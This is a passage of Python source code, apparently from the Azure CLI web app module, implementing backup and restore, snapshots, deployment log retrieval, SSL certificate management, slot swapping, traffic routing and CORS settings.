frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = application_logging != 'off'
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
level = application_logging != 'off'
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
runtime = re.split('[| :]', runtime) # delimiters allowed: '|', ' ', ':'
return '|'.join(filter(None, runtime))
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
